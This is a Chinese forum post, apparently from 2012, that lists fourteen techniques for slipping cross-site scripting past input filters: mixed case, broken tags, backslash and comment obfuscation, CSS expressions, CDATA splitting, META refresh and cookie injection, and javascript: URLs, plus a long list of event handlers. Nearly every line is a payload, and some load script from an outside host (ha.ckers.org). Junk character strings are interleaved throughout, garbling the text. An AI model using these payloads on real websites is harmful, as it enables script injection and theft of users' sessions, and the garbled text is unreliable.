1. 改变字符大小写# H4 N- g# a0 r4 L3 N7 { r+ R4 n
\: G& E/ W4 ^, P
; x1 r9 f* `0 V9 B7 R/ S0 D
/ W; g6 U* z1 X& E$ H <sCript>alert(‘d’)</scRipT>0 G4 l7 u3 j3 s; t5 m7 _. `
1 c. H+ m! Q! u7 y% v7 k
2. 利用多加一些其它字符来规避Regular Expression的检查
" j) x: d" j2 k5 f
8 U* A2 v% g6 P, u5 o, [ <<script>alert(‘c’)//<</script>
2 g: p1 }$ X* r/ t9 O U! [( ~1 |* B& z3 K8 g( W
<SCRIPT a=">" SRC="t.js"></SCRIPT>- Z3 R! e% Y9 e' y
2 `# x3 N8 s a; q/ O# R <SCRIPT =">" SRC="t.js"></SCRIPT>
, m1 e2 B3 d. K4 p& D' I7 F0 M7 v5 }+ L1 j' @& g
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>1 O X( }% X$ ?8 B- ]
" a7 k( t* R0 E( L
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>" n2 O' K# q+ l; N. a- \" C* t+ m* W/ ~1 R
5 y5 p# D0 R+ a" Y+ p
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
M- g, o& w; D) T% a% V2 @. [8 \# `) v; G# {
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>4 R9 a! T. g0 z
' ~6 n& ?# Z6 @& Q* ?
3. 以其它扩展名取代.js
7 `, l. @5 D/ h* V) I; L: r- D3 Y+ p
# |/ J) i( M( o b; O! n <script src="bad.jpg"></script>
8 v/ A w5 n6 D% [3 z# n' {# r& W
4. 将Javascript写在CSS档里 _! z5 ^; @! ^3 C. f& P
/ y! h1 g# b( l9 o <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> P( m9 Q* c" x ^% q0 Z
7 H6 P% d/ O' Q$ G/ k# K example:
. E& t# a* P1 |, f" I1 K4 l
3 s6 @0 U5 M) D; C body { F) v! z& s* N. J( O
: {! S1 G: ~4 s background-image: url(‘javascript:alert("XSS");’)3 f0 E2 H8 U: b& K& T8 t6 L
2 I, S8 b, A1 R3 q; q8 ~9 b. Q
}3 E7 Y$ ~# W7 U0 _ P# R% }
/ q" q2 f' z0 N9 f) {) Q7 w! n
5. 在script的tag里加入一些其它字符
) e. X e1 K1 N+ Q
: @2 N$ h, E' @8 h% A$ j <SCRIPT/SRC="t.js"></SCRIPT>2 [( \9 U6 P1 ~, Y
0 X/ J7 Q- c. m, [
<SCRIPT/anyword SRC="t.js"></SCRIPT>
% z% M3 G5 u5 a/ |/ n- R+ @4 p/ ]) x ?
) A2 q2 v+ G; j8 A6. 使用tab或是new line来规避
+ ^+ |! b! k0 X0 N; F9 V L% a' y; C- J% _3 Q4 a
<img src="jav ascr ipt:alert(‘XSS3′)">* o8 D/ v1 Z. s/ G: r8 |/ ~5 c! }
9 y# u# s+ u- @8 R3 l8 w <img src="jav ascr ipt:alert(‘XSS3′)">7 V. F( d1 g5 r9 g- y' V
) g& @ O! h; X( s <IMG SRC="jav ascript:alert(‘XSS’);">
( j0 U f/ j' F8 b$ x4 b u X, p; ?: n7 ^( u
-> tag
. A+ J g8 n, @
9 ]7 k2 a8 a& u' N9 l0 Q -> new line8 _/ T. k! I2 G6 x5 Z* w* V
. M( S3 ]5 K8 U3 K/ q7. 使用"\"来规避# j3 p! E% M% S5 [2 p6 J% W
% k+ g/ f$ s3 h' y6 H; P2 e6 @
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>! ?6 L2 Y. }" {& G5 \& ~
# H5 Q2 ?9 B0 `7 }& v2 Y" P
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
7 ~& ?' W$ g3 h* ^: n- Z: M. w) a5 Z
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
" |) _4 O: ?5 K$ ~' g
. [% [7 C+ [, n5 l- F% x <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" j- F7 W: h# c; Y# V
. s! Z' p9 b$ W' y. Z0 F9 A
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
6 J3 O: n1 r8 \! w# e4 Z P4 \# T& n4 B$ H
8. 使用Hex encode来规避(也可能会把";"拿掉)0 {' \- f ^: ~( b; ^* l
; M2 ]+ _5 m# J3 \7 ~2 g <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
" J- ^* v. @" S1 N
) M% c$ Z" k) V2 | 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
/ T h: S! H* B0 M l( Z1 r% U0 a* n! x: A5 C8 X$ p3 o
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
! f9 k- V8 G8 M, b: j
/ g# ]8 R- @5 Z. s/ g3 \ 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9 w- h D3 V4 f6 x7 J: t$ V! ]
6 _$ w4 X0 D: M. J, e$ j9. script in HTML tag* o) I! m' E3 n' E5 ^; b
4 ~ H% c5 O" E! o8 y5 k& U <body onload=」alert(‘onload’)」>
0 }) R$ J9 P! C+ P( q& ?' `6 v# E- Y8 u3 W4 D
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload1 m ^: U2 c7 y4 U0 t7 z! l
$ J/ [& M" Y3 f! U& F
10. 在swf里含有xss的code6 q; q: K* {, L2 X- S
- H% v- @6 A1 j% I <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>4 H2 N' \- u5 B% h3 B
0 B7 M. _3 n Q, D* u9 \+ ~* l
11. 利用CDATA将xss的code拆开,再组合起来。8 c7 N+ D' s) n: U1 ^
5 A5 G4 {: [& k2 ~
<XML ID=I><X><C>
( o4 X8 S+ W1 B& K; p o2 v& J7 t
: X8 z; `- {& L( z$ Y <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>: Y% g6 o. `3 L8 e2 x# Y
7 o5 G, g. o& F. [2 X4 x* `) P
</C></X>
3 S* I* G5 _* B7 A' D# W, ~$ L1 _0 f! w
</xml>+ h! _2 p4 h0 J# A8 _
" N3 Z" ]1 H D8 f3 J <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>! \# b% |* D8 p& a9 w0 E. [ _
: o1 {6 ], S! J- y. B <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
3 Q) t: I( ^7 t( P* l3 T9 l
! W2 K6 O( h% i$ b" H <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>8 A$ u3 B2 P. N5 Z! C! @% {
# t. T( ^: i0 a% Y; D12. 利用HTML+TIME。
" d9 g% u' k! `: J& L$ k: ?7 q ~4 T* ~2 a8 S+ D8 s, z. T
<HTML><BODY>
7 W3 Y: }$ _0 r# W1 ?) x, n) i; r. a) U! ^* P" Q
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
: m+ c" M7 x; S; b% b
! J: c6 _- x* Z% U4 I7 Q z <?import namespace="t" implementation="#default#time2">
7 V, X7 v4 H; V k$ u
/ W/ p) ~7 M! h1 @4 }' E$ C <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">+ G& S# S z3 T7 W! n
: H6 u$ H& i" Z; O
</BODY></HTML>: \. \, j2 r0 v
" r6 Y7 h1 S- G
13. 透过META写入Cookie。
" i* \2 f( z7 B. {8 m
; \5 r- L% z, @$ _3 H# l6 r <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">0 \! g5 x# L3 ]% T3 v( u
! S7 l j; w: w5 R4 \" X
14. javascript in src , href , url
# u6 g& E; V, \5 H# T
- h; U0 W' V( x. \ <IFRAME SRC=javascript:alert(’13′)></IFRAME>1 @; p$ a0 y* e3 P
) B9 I9 K* Q" Z; `% U% m- m/ \ <img src="javascript:alert(‘XSS3′)">2 P' w, Q3 }! w1 g+ l4 C! i
+ o4 E* v/ S/ P5 m
<IMG DYNSRC="javascript:alert(‘XSS20′)">
: Q2 ~4 @% h4 x. ~/ {
. M- {3 R( ^( T2 a% D+ I <IMG LOWSRC="javascript:alert(‘XSS21′)">
4 J# H+ x% ?) [1 @5 F1 G9 A! ]+ R1 y1 e! a0 k9 L
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">* g1 T" T; @; v( l( J7 |. s
* ?) f& {+ ^+ o! h
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>/ l5 F( G1 X/ v, H& y5 D
1 e0 c! h: H- q, n <TABLE BACKGROUND="javascript:alert(‘XSS29′)">. ~3 \0 h6 h: p3 H+ M$ c2 {
/ [- k4 ^# L! J0 P6 U: u <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
$ N. M; c" e8 X/ j" k. ^
2 r, |6 h4 Q- L/ P3 j <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
7 a7 r6 i, y* S1 T" b0 ]
( A2 Q2 L* g+ Z </STYLE><A CLASS=XSS></A>
0 r3 u% v, e, n" ?$ a. [0 l4 E' D% F' n
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
/ X5 D% h) k6 {) ~$ a7 J8 i, G. J$ n7 J1 `4 H; n: p
|
发表于 2012-12-31 09:59:28
收藏
支持
反对